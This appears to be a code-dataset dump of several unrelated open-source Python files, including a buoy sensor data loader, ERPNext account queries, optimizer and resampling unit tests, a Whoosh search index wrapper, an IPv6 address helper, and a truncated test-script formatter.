repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
lindakukolich/sensor_data_exploration | sensor_data_exploration/data_collection/beacon_buoy_addData.py | 1 | 4451 | #! /usr/bin/env python
# 15.January.2014 Liz Brooks
# script to add SensorData values to the database
# from Beacon Buoys
# (run with -h to see full usage message)
# as new sensors are added, add them to the list of sensors (keys) in main.
import sys
import argparse
import urllib2
from datetime import datetime,tzinfo,timedelta
import populate
debug = True
deviceID='2232583' # buoy #5 Thompson Island Mooring Field
def get_args():
parser = argparse.ArgumentParser(description='Load historical data from beacon buoy into the database.')
parser.add_argument('--history', action='store_true',
help='Collect all available data.')
parser.add_argument('--current', action='store_true',
help='Collect data from dates more recent than those already in the database.')
parser.add_argument('--cesn', action='store_true',
help='use alternate url - cesn, rather than hobolink, to get data.')
args = parser.parse_args()
if args.history == args.current:
sys.exit("You must specify either --history OR --current")
return args
def get_data(url):
'''fetch data from this url'''
f = urllib2.urlopen(url)
datalist=f.readlines()
f.close()
return datalist
def clean_data(datalist,cesn_format):
data = []
if not cesn_format:
for i,line in enumerate(datalist):
if line.startswith('----'):
datalist = datalist[i+2:]
break
for line in datalist:
if line.startswith('#'): continue
data.append(line.split(','))
return data
class EST(tzinfo):
'''returns an object representing EST time zone offset'''
def utcoffset(self, dt):
return timedelta(hours=-5)
def dst(self, dt):
return timedelta(0)
def parse_dt(dt_string):
'''takes a string and returns a datetime object'''
tz = EST()
# '12/6/13 14:00:00', "Time, Eastern Daylight Time"
# or '2013-08-22 12:00:00'
if '/' in dt_string:
x=datetime.strptime(dt_string, "%m/%d/%y %H:%M:%S")
else:
x=datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S")
dt=datetime(int(x.year),int(x.month),int(x.day),int(x.hour),int(x.minute),int(x.second),tzinfo=tz)
return dt
if __name__ == '__main__':
args = get_args()
if debug: print "Starting Beacon Buoy population script..."
# list of sensors for this source: (sensor_id, field# Hobolink (default), field# Cesn)
keys=[("buoy5_Salinity",13,2),
("buoy5_CDOM",12,3),
("buoy5_WaterTemp",2,5),
("buoy5_AirTemp",7,6),
("buoy5_WindSpeed",3,7),
("buoy5_GustSpeed",4,8),
("buoy5_WindDir",5,9),
("buoy5_BuoyDir",6,10),
("buoy5_Pressure",10,11),
("buoy5_RelHumidity",8,12),
("buoy5_DewPt",9,13),
("buoy5_PAR",11,14),
]
# get sensor objects for each sensor
if debug: print "Getting sensor information..."
sensors=populate.get_sensors(keys)
# get data list
if debug: print "Reading data..."
url='http://webservice.hobolink.com/rest/public/devices/%s/data_files/latest/txt' % (deviceID,)
if args.cesn:
url='http://cesn.org/live/archive_Thompson.txt'
data = get_data(url)
data = clean_data(data,args.cesn)
# get the latest date already in the database
previous_load_date = None
if args.current:
previous_load_date = populate.database_latest_date(keys)
# load sensor data
if debug: print "Loading data..."
for entry in data:
timestamp = parse_dt(entry[1])
if args.current:
if previous_load_date and timestamp <= previous_load_date:
continue
for key in keys:
value = entry[ key[1] ]
if args.cesn:
value = entry[ key[2] ]
if not value: # skip empty cells
continue
if value.startswith('-888.') or value.startswith('-889.'):
continue
numeric = sensors[key[0]].data_is_number
if numeric:
value = float(value)
populate.load_data(sensor_id=sensors[key[0]], time_stamp=timestamp, num_value=value, value_is_number=True)
else:
populate.load_data(sensor_id=sensors[key[0]], time_stamp=timestamp, string_value=value)
if debug: print "Finishing Beacon Buoy population script..."
| mit | 3,915,266,116,321,284,600 | 33.503876 | 122 | 0.600764 | false |
gangadhar-kadam/mic-erpnext | accounts/page/accounts_browser/accounts_browser.py | 5 | 1909 | from __future__ import unicode_literals
import webnotes
import webnotes.defaults
from webnotes.utils import flt
from accounts.utils import get_balance_on
@webnotes.whitelist()
def get_companies():
"""get a list of companies based on permission"""
# check if match permission exists
res = webnotes.conn.sql("""select role, `match` from `tabDocPerm`
where parent='Account' and permlevel=0 and `read`=1""", as_dict=1)
roles = webnotes.user.get_roles()
match = any((r["match"] for r in res
if r["role"] in roles and r["match"]=="company"))
# if match == company is specified and companies are specified in user defaults
if match:
return webnotes.defaults.get_user_default_as_list("company")
else:
return [r[0] for r in webnotes.conn.sql("""select name from tabCompany
where docstatus!=2""")]
@webnotes.whitelist()
def get_children():
args = webnotes.form_dict
ctype, company = args['ctype'], args['comp']
company_field = ctype=='Account' and 'company' or 'company_name'
# root
if args['parent'] == company:
acc = webnotes.conn.sql(""" select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = ''
and %s = %s and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), company_field, '%s'),
args['parent'], as_dict=1)
else:
# other
acc = webnotes.conn.sql("""select
name as value, if(group_or_ledger='Group', 1, 0) as expandable
from `tab%s`
where ifnull(parent_%s,'') = %s
and docstatus<2
order by name""" % (ctype, ctype.lower().replace(' ','_'), '%s'),
args['parent'], as_dict=1)
if ctype == 'Account':
currency = webnotes.conn.sql("select default_currency from `tabCompany` where name = %s", company)[0][0]
for each in acc:
bal = get_balance_on(each.get("value"))
each["currency"] = currency
each["balance"] = flt(bal)
return acc
| agpl-3.0 | -8,040,449,826,540,733,000 | 31.355932 | 106 | 0.65846 | false |
liukaijv/XlsxWriter | xlsxwriter/test/workbook/test_workbook01.py | 8 | 1641 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
import unittest
from ...compatibility import StringIO
from ..helperfunctions import _xml_to_list
from ...workbook import Workbook
class TestAssembleWorkbook(unittest.TestCase):
"""
Test assembling a complete Workbook file.
"""
def test_assemble_xml_file(self):
"""Test writing a workbook with 1 worksheet."""
self.maxDiff = None
fh = StringIO()
workbook = Workbook()
workbook._set_filehandle(fh)
workbook.add_worksheet()
workbook._assemble_xml_file()
workbook.fileclosed = 1
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<fileVersion appName="xl" lastEdited="4" lowestEdited="4" rupBuild="4505"/>
<workbookPr defaultThemeVersion="124226"/>
<bookViews>
<workbookView xWindow="240" yWindow="15" windowWidth="16095" windowHeight="9660"/>
</bookViews>
<sheets>
<sheet name="Sheet1" sheetId="1" r:id="rId1"/>
</sheets>
<calcPr calcId="124519" fullCalcOnLoad="1"/>
</workbook>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| bsd-2-clause | -1,727,182,614,204,291,000 | 32.489796 | 170 | 0.551493 | false |
drpngx/tensorflow | tensorflow/python/training/adagrad_test.py | 11 | 13233 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for aggregate operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adagrad
class AdagradOptimizerTest(test.TestCase):
def doTestBasic(self,
use_locking=False,
use_resource=False,
use_callable_params=False):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
if use_resource:
var0 = resource_variable_ops.ResourceVariable([1.0, 2.0], dtype=dtype)
var1 = resource_variable_ops.ResourceVariable([3.0, 4.0], dtype=dtype)
else:
var0 = variables.Variable([1.0, 2.0], dtype=dtype)
var1 = variables.Variable([3.0, 4.0], dtype=dtype)
grads0 = constant_op.constant([0.1, 0.1], dtype=dtype)
grads1 = constant_op.constant([0.01, 0.01], dtype=dtype)
learning_rate = lambda: 3.0
if not use_callable_params:
learning_rate = learning_rate()
ada_opt = adagrad.AdagradOptimizer(
learning_rate, initial_accumulator_value=0.1, use_locking=use_locking)
if not context.executing_eagerly():
ada_update = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
self.evaluate(variables.global_variables_initializer())
# Fetch params to validate initial values
v0_val, v1_val = self.evaluate([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([3.0, 4.0], v1_val)
# Run 3 steps of adagrad
for _ in range(3):
if not context.executing_eagerly():
self.evaluate(ada_update)
else:
ada_opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
# Validate updated params
v0_val, v1_val = self.evaluate([var0, var1])
self.assertAllCloseAccordingToType(
np.array([-1.6026098728179932, -0.6026098728179932]), v0_val)
self.assertAllCloseAccordingToType(
np.array([2.715679168701172, 3.715679168701172]), v1_val)
def testBasic(self):
self.doTestBasic(use_locking=False)
@test_util.run_in_graph_and_eager_modes(reset_test=True)
def testBasicResource(self):
self.doTestBasic(use_locking=False, use_resource=True)
def testBasicCallableParams(self):
with context.eager_mode():
self.doTestBasic(
use_locking=False, use_resource=True, use_callable_params=True)
def testBasicLocked(self):
self.doTestBasic(use_locking=True)
def testMinimizeSparseResourceVariable(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = resource_variable_ops.ResourceVariable(
[[1.0, 2.0], [3.0, 4.0]], dtype=dtype)
x = constant_op.constant([[4.0], [5.0]], dtype=dtype)
pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x)
loss = pred * pred
sgd_op = adagrad.AdagradOptimizer(1.0).minimize(loss)
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllCloseAccordingToType(
[[1.0, 2.0], [3.0, 4.0]], var0.eval())
# Run 1 step of sgd
sgd_op.run()
# Validate updated params
self.assertAllCloseAccordingToType(
[[0, 1], [3, 4]], var0.eval(), atol=0.01)
def testTensorLearningRate(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = variables.Variable([1.0, 2.0], dtype=dtype)
var1 = variables.Variable([3.0, 4.0], dtype=dtype)
grads0 = constant_op.constant([0.1, 0.1], dtype=dtype)
grads1 = constant_op.constant([0.01, 0.01], dtype=dtype)
ada_opt = adagrad.AdagradOptimizer(
constant_op.constant(3.0), initial_accumulator_value=0.1)
ada_update = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Run 3 steps of adagrad
for _ in range(3):
ada_update.run()
# Validate updated params
self.assertAllCloseAccordingToType(
np.array([-1.6026098728179932, -0.6026098728179932]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([2.715679168701172, 3.715679168701172]), var1.eval())
def testSparseBasic(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = variables.Variable([[1.0], [2.0]], dtype=dtype)
var1 = variables.Variable([[3.0], [4.0]], dtype=dtype)
grads0 = ops.IndexedSlices(
constant_op.constant(
[0.1], shape=[1, 1], dtype=dtype),
constant_op.constant([0]),
constant_op.constant([2, 1]))
grads1 = ops.IndexedSlices(
constant_op.constant(
[0.01], shape=[1, 1], dtype=dtype),
constant_op.constant([1]),
constant_op.constant([2, 1]))
ada_opt = adagrad.AdagradOptimizer(3.0, initial_accumulator_value=0.1)
ada_update = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([[1.0], [2.0]], var0.eval())
self.assertAllClose([[3.0], [4.0]], var1.eval())
# Run 3 step of sgd
for _ in range(3):
ada_update.run()
# Validate updated params
self.assertAllCloseAccordingToType(
np.array([[-1.6026098728179932], [2.0]]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([[3.0], [3.715679168701172]]), var1.eval())
def testSparseRepeatedIndices(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
repeated_index_update_var = variables.Variable(
[[1.0], [2.0]], dtype=dtype)
aggregated_update_var = variables.Variable(
[[1.0], [2.0]], dtype=dtype)
grad_repeated_index = ops.IndexedSlices(
constant_op.constant(
[0.1, 0.1], shape=[2, 1], dtype=dtype),
constant_op.constant([1, 1]),
constant_op.constant([2, 1]))
grad_aggregated = ops.IndexedSlices(
constant_op.constant(
[0.2], shape=[1, 1], dtype=dtype),
constant_op.constant([1]),
constant_op.constant([2, 1]))
repeated_update = adagrad.AdagradOptimizer(3.0).apply_gradients(
[(grad_repeated_index, repeated_index_update_var)])
aggregated_update = adagrad.AdagradOptimizer(3.0).apply_gradients(
[(grad_aggregated, aggregated_update_var)])
variables.global_variables_initializer().run()
self.assertAllClose(aggregated_update_var.eval(),
repeated_index_update_var.eval())
for _ in range(3):
repeated_update.run()
aggregated_update.run()
self.assertAllClose(aggregated_update_var.eval(),
repeated_index_update_var.eval())
def testSparseRepeatedIndicesResourceVariable(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var_repeated = resource_variable_ops.ResourceVariable(
[1.0, 2.0], dtype=dtype)
loss_repeated = math_ops.reduce_sum(
embedding_ops.embedding_lookup(var_repeated, [0, 0]))
var_aggregated = resource_variable_ops.ResourceVariable(
[1.0, 2.0], dtype=dtype)
loss_aggregated = 2 * math_ops.reduce_sum(
embedding_ops.embedding_lookup(var_aggregated, [0]))
update_op_repeated = adagrad.AdagradOptimizer(
2.0).minimize(loss_repeated)
update_op_aggregated = adagrad.AdagradOptimizer(
2.0).minimize(loss_aggregated)
variables.global_variables_initializer().run()
self.assertAllCloseAccordingToType(
var_repeated.eval(), var_aggregated.eval())
for _ in range(3):
update_op_repeated.run()
update_op_aggregated.run()
self.assertAllCloseAccordingToType(
var_repeated.eval(), var_aggregated.eval())
def testSparseStability(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
shape = [1, 6]
var0 = variables.Variable(
[[
0.00872496, -0.106952, 0.110467, 0.226505, -0.0147257,
-0.0105945
]],
dtype=dtype)
grads0 = ops.IndexedSlices(
constant_op.constant(
[[
-5.91278e-05, 5.31673e-05, -2.5779e-06, 4.29153e-05,
-8.4877e-05, -9.48906e-05
]],
shape=shape,
dtype=dtype),
constant_op.constant([0]),
constant_op.constant(shape))
ada_opt = adagrad.AdagradOptimizer(1.0, initial_accumulator_value=0.1)
ada_update = ada_opt.apply_gradients(zip([grads0], [var0]))
self.assertEqual(["accumulator"], ada_opt.get_slot_names())
slot0 = ada_opt.get_slot(var0, "accumulator")
init = variables.global_variables_initializer()
for _ in range(100):
init.run()
ada_update.run()
self.assertAllCloseAccordingToType(
np.array([[0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]), slot0.eval())
self.assertAllCloseAccordingToType(
np.array([[
0.00891194, -0.10712013, 0.11047515, 0.22636929, -0.0144573,
-0.01029443
]]), var0.eval())
def testSharing(self):
for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:
with self.test_session():
var0 = variables.Variable([1.0, 2.0], dtype=dtype)
var1 = variables.Variable([3.0, 4.0], dtype=dtype)
grads0 = constant_op.constant([0.1, 0.1], dtype=dtype)
grads1 = constant_op.constant([0.01, 0.01], dtype=dtype)
ada_opt = adagrad.AdagradOptimizer(3.0)
# Apply the optimizer twice. Both applications will use
# the same accums.
ada_update1 = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
ada_update2 = ada_opt.apply_gradients(
zip([grads0, grads1], [var0, var1]))
self.assertEqual(["accumulator"], ada_opt.get_slot_names())
slot0 = ada_opt.get_slot(var0, "accumulator")
self.assertEquals(slot0.get_shape(), var0.get_shape())
slot1 = ada_opt.get_slot(var1, "accumulator")
self.assertEquals(slot1.get_shape(), var1.get_shape())
variables.global_variables_initializer().run()
# Fetch params to validate initial values.
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Mix the first and the second adagrad for 3 steps.
ada_update1.run()
ada_update2.run()
ada_update1.run()
# Validate updated params (the same as with only 1 Adagrad).
self.assertAllCloseAccordingToType(
np.array([-1.6026098728179932, -0.6026098728179932]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([2.715679168701172, 3.715679168701172]), var1.eval())
def testDynamicShapeVariable_Ok(self):
with self.test_session():
v = variable_scope.get_variable("v", initializer=constant_op.constant(1.),
validate_shape=False)
self.assertFalse(v.shape.is_fully_defined())
# Creating optimizer should cause no exception.
adagrad.AdagradOptimizer(3.0, initial_accumulator_value=0.1)
if __name__ == "__main__":
test.main()
| apache-2.0 | 9,010,061,881,076,805,000 | 42.104235 | 80 | 0.617471 | false |
codekansas/liveqa2017 | liveqa/vertical/indexing.py | 1 | 6517 | from unidecode import unidecode
from whoosh.analysis import StemmingAnalyzer
from whoosh.index import create_in, open_dir, exists_in
from whoosh.writing import AsyncWriter
from whoosh.fields import *
from whoosh.qparser import QueryParser, MultifieldParser, syntax
import os.path
import logging
BASE = os.path.dirname(os.path.realpath(__file__))
INDEX_DIRECTORY = os.path.join(BASE, 'index/')
STOPWORDS_FILE = os.path.join(BASE, 'stopwords.txt')
BAD_WORDS_FILE = os.path.join(BASE, 'bad-words.txt')
class Indexing(object):
def __init__(self, mode='read', directory=INDEX_DIRECTORY):
"""Creates an Indexing object to communicate with Woosh.
Args:
mode: str (default: "read"), "read" or "write" (the mode to use).
directory: str, where to index files (defaults to INDEX_DIRECTORY).
"""
# self.schema = self.getSchema()
# if not os.path.exists("indexdir"):
# print ("directory not exist")
# os.mkdir("indexdir")
# self.ix = create_in("indexdir", self.schema)
# self.ix = open_dir("indexdir")
# self.writer = AsyncWriter(self.ix)
# self.writer = self.ix.writer()
# self.ix.reader()
self.directory = directory
self.isWriteModeOn = False
self.isReadModeOn = False
# Loads stopwords from the associated file.
with open(STOPWORDS_FILE, 'r') as f:
self.stoplist = set(f.read().strip().split())
with open(BAD_WORDS_FILE, 'r') as f:
self.bad_words = set(f.read().strip().split())
mode = mode.lower()
if mode == 'write':
self.turnOnWriteMode()
elif mode == 'read':
self.turnOnReadMode()
# Initializes the parsers.
self.question_parser = QueryParser('ba',
schema=self.ix.schema,
group=syntax.OrGroup)
self.answer_parser = QueryParser('title',
schema=self.ix.schema,
group=syntax.OrGroup)
self.searcher = self.ix.searcher()
else:
raise ValueError('Invalid mode: "%s" (should be "read" or '
'"write").' % mode)
def indexing(self, subject, content, bestAnswer):
# title = subject
# body = content
# ba = bestAnswer
if self.isWriteModeOn:
# exists = exists_in("indexdir")
# if not exists:
self.writer.add_document(title=subject,
body=content,
ba=bestAnswer)
# self.writer.commit()
def getSchema(self):
return Schema(title=TEXT(stored=True),
body=TEXT(analyzer=StemmingAnalyzer()),
ba=TEXT(stored=True))
def closeWriter(self):
self.writer.commit()
def closeIndexing(self):
self.ix.close()
def turnOnReadMode(self):
self.isReadModeOn = True
self.isWriteModeOn = False
self.schema = self.getSchema()
self.ix = open_dir(self.directory)
self.ix.reader()
def turnOnWriteMode(self):
self.isWriteModeOn = True
self.isReadModeOn = False
self.schema = self.getSchema()
if not os.path.exists(self.directory):
logging.info("directory does not exist")
os.mkdir(self.directory)
self.ix = create_in(self.directory, self.schema)
self.ix = open_dir(self.directory)
# self.writer = AsyncWriter(self.ix)
self.writer = self.ix.writer()
# def getIsNeedParse(self):
# return
def clean(self, text):
"""Cleans text before returning it to the user.
Args:
text: str, the text to clean.
Returns:
string, the cleaned text.
"""
text = text.replace('\n', ' ')
return text
def clean_query(self, text):
"""Does pre-processing on a query.
Args:
text: the query text.
Returns:
the cleaned query text as a string.
"""
tokens = re.findall('[\w\d\']+\'?[\w\d\']+', text)
query = ' '.join(t for t in tokens if t not in self.stoplist)
return query
def filter(self, texts):
"""Filters out examples with bad words in them.
Args:
texts: list of strings, the texts to filter.
Returns:
list of strings, the filtered texts.
"""
def not_bad(text):
return all(x.strip() not in self.bad_words
for x in text.lower().split(' '))
return [text for text in texts if not_bad(text)]
def get_top_n_questions(self, query, limit=500):
"""Returns the top questions related to a given query.
Args:
query: str, the query to parse.
limit: int, the maximum number of documents to return.
Returns:
list of strings, the top results for the given query.
"""
query = self.clean_query(query)
logging.info('query: %s', query)
# self.query = MultifieldParser(['title', 'body', 'ba'],
# schema=self.ix.schema,
# group=syntax.OrGroup).parse(query)
query = self.question_parser.parse(query)
results = self.searcher.search(query, limit=limit)
# Cleans the retrieved results.
results = [self.clean(result.get('title')) for result in results]
# Filters out "bad" answers.
results = self.filter(results)
return results
def get_top_n_answers(self, query, limit=500):
"""Returns the top results for a given query.
Args:
query: str, the query to parse.
limit: int, the maximum number of documents to return.
Returns:
list of strings, the top results for the given query.
"""
query = self.clean_query(query)
logging.info('query: %s', query)
query = self.answer_parser.parse(query)
results = self.searcher.search(query, limit=limit)
# Cleans the provided results.
results = [self.clean(result.get('ba')) for result in results]
# Filters out "bad" answers.
results = self.filter(results)
return results
| gpl-3.0 | 2,524,822,915,073,584,000 | 30.790244 | 79 | 0.552095 | false |
RPGOne/Skynet | imbalanced-learn-master/imblearn/under_sampling/tests/test_nearmiss_2.py | 1 | 6280 | """Test the module nearmiss."""
from __future__ import print_function
import os
import numpy as np
from numpy.testing import assert_raises
from numpy.testing import assert_equal
from numpy.testing import assert_array_equal
from numpy.testing import assert_warns
from sklearn.datasets import make_classification
from sklearn.utils.estimator_checks import check_estimator
from imblearn.under_sampling import NearMiss
# Generate a global dataset to use
RND_SEED = 0
X, Y = make_classification(n_classes=2, class_sep=2, weights=[0.1, 0.9],
n_informative=3, n_redundant=1, flip_y=0,
n_features=20, n_clusters_per_class=1,
n_samples=5000, random_state=RND_SEED)
VERSION_NEARMISS = 2
def test_nearmiss_sk_estimator():
"""Test the sklearn estimator compatibility"""
check_estimator(NearMiss)
def test_nearmiss_bad_ratio():
"""Test either if an error is raised with a wrong decimal value for
the ratio"""
# Define a negative ratio
ratio = -1.0
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
# Define a ratio greater than 1
ratio = 100.0
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
# Define ratio as an unknown string
ratio = 'rnd'
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
# Define ratio as a list which is not supported
ratio = [.5, .5]
nm1 = NearMiss(ratio=ratio, random_state=RND_SEED)
assert_raises(ValueError, nm1.fit, X, Y)
def test_nearmiss_wrong_version():
"""Test either if an error is raised when the version is unknown."""
version = 1000
nm2 = NearMiss(version=version, random_state=RND_SEED)
assert_raises(ValueError, nm2.fit_sample, X, Y)
def test_nearmiss_init():
"""Test the initialisation of the object"""
# Define a ratio
ratio = 1.
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
assert_equal(nm2.version, VERSION_NEARMISS)
assert_equal(nm2.size_ngh, 3)
assert_equal(nm2.ratio, ratio)
assert_equal(nm2.random_state, RND_SEED)
def test_nearmiss_fit_single_class():
"""Test either if an error when there is a single class"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Resample the data
# Create a wrong y
y_single_class = np.zeros((X.shape[0], ))
assert_warns(RuntimeWarning, nm2.fit, X, y_single_class)
def test_nm_fit_invalid_ratio():
"""Test either if an error is raised when the balancing ratio to fit is
smaller than the one of the data"""
# Create the object
ratio = 1. / 10000.
nm = NearMiss(ratio=ratio, random_state=RND_SEED)
# Fit the data
assert_raises(RuntimeError, nm.fit, X, Y)
def test_nm2_fit():
"""Test the fitting method"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Fit the data
nm2.fit(X, Y)
# Check if the data information have been computed
assert_equal(nm2.min_c_, 0)
assert_equal(nm2.maj_c_, 1)
assert_equal(nm2.stats_c_[0], 500)
assert_equal(nm2.stats_c_[1], 4500)
def test_nm2_sample_wt_fit():
"""Test either if an error is raised when sample is called before
fitting"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
assert_raises(RuntimeError, nm2.sample, X, Y)
def test_nm2_fit_sample_auto():
"""Test fit and sample routines with auto ratio"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Fit and sample
X_resampled, y_resampled = nm2.fit_sample(X, Y)
currdir = os.path.dirname(os.path.abspath(__file__))
X_gt = np.load(os.path.join(currdir, 'data', 'nm2_x.npy'))
y_gt = np.load(os.path.join(currdir, 'data', 'nm2_y.npy'))
assert_array_equal(X_resampled, X_gt)
assert_array_equal(y_resampled, y_gt)
def test_nm2_fit_sample_auto_indices():
"""Test fit and sample routines with auto ratio and indices support"""
# Define the parameter for the under-sampling
ratio = 'auto'
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS, return_indices=True)
# Fit and sample
X_resampled, y_resampled, idx_under = nm2.fit_sample(X, Y)
currdir = os.path.dirname(os.path.abspath(__file__))
X_gt = np.load(os.path.join(currdir, 'data', 'nm2_x.npy'))
y_gt = np.load(os.path.join(currdir, 'data', 'nm2_y.npy'))
idx_gt = np.load(os.path.join(currdir, 'data', 'nm2_idx.npy'))
assert_array_equal(X_resampled, X_gt)
assert_array_equal(y_resampled, y_gt)
assert_array_equal(idx_under, idx_gt)
def test_nm2_fit_sample_half():
"""Test fit and sample routines with .5 ratio"""
# Define the parameter for the under-sampling
ratio = .5
# Create the object
nm2 = NearMiss(ratio=ratio, random_state=RND_SEED,
version=VERSION_NEARMISS)
# Fit and sample
X_resampled, y_resampled = nm2.fit_sample(X, Y)
currdir = os.path.dirname(os.path.abspath(__file__))
X_gt = np.load(os.path.join(currdir, 'data', 'nm2_x_05.npy'))
y_gt = np.load(os.path.join(currdir, 'data', 'nm2_y_05.npy'))
assert_array_equal(X_resampled, X_gt)
assert_array_equal(y_resampled, y_gt)
def test_nm2_sample_wrong_X():
"""Test either if an error is raised when X is different at fitting
and sampling"""
# Create the object
nm2 = NearMiss(random_state=RND_SEED, version=VERSION_NEARMISS)
nm2.fit(X, Y)
assert_raises(RuntimeError, nm2.sample, np.random.random((100, 40)),
np.array([0] * 50 + [1] * 50))
| bsd-3-clause | 2,205,732,359,631,018,200 | 29.485437 | 75 | 0.652389 | false |
gooddata/openstack-nova | nova/ipv6/account_identifier.py | 12 | 1904 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""IPv6 address generation with account identifier embedded."""
import hashlib
import netaddr
import six
from nova.i18n import _
def to_global(prefix, mac, project_id):
addr = project_id
if isinstance(addr, six.text_type):
addr = addr.encode('utf-8')
addr = hashlib.sha1(addr)
addr = int(addr.hexdigest()[:8], 16) << 32
project_hash = netaddr.IPAddress(addr)
static_num = netaddr.IPAddress(0xff << 24)
try:
mac_suffix = netaddr.EUI(mac).value & 0xffffff
mac_addr = netaddr.IPAddress(mac_suffix)
except netaddr.AddrFormatError:
raise TypeError(_('Bad mac for to_global_ipv6: %s') % mac)
try:
maskIP = netaddr.IPNetwork(prefix).ip
return (project_hash ^ static_num ^ mac_addr | maskIP).format()
except netaddr.AddrFormatError:
raise TypeError(_('Bad prefix for to_global_ipv6: %s') % prefix)
def to_mac(ipv6_address):
address = netaddr.IPAddress(ipv6_address)
mask1 = netaddr.IPAddress('::ff:ffff')
mac = netaddr.EUI(int(address & mask1)).words
return ':'.join(['02', '16', '3e'] + ['%02x' % i for i in mac[3:6]])
| apache-2.0 | 2,200,847,843,023,396,900 | 33.618182 | 78 | 0.684874 | false |
vrutkovs/beehive | beehive/formatter/reproducer.py | 1 | 5536 | # -*- coding: utf-8 -*-
from beehive.formatter.base import Formatter
import inspect
import re
import types
import os
try:
import importlib
except ImportError:
pass
class ReproducerFormatter(Formatter):
name = "reproducer"
description = "Script creating formatter"
def __init__(self, stream_opener, config, **kwargs):
super(ReproducerFormatter, self).__init__(stream_opener, config)
self.stream = self.open()
self.steps = []
# Get hooks code
self.hooks = self._import_hooks(config.env_py)
# Write a python encoding
self.stream.write('# -*- coding: utf-8 -*-\n\n')
# Write initial imports
imports = self._get_step_imports(config.env_py, config.steps_dir)
[self.stream.write(line) for line in imports]
self.stream.write('\n\n')
# Make a fake context object
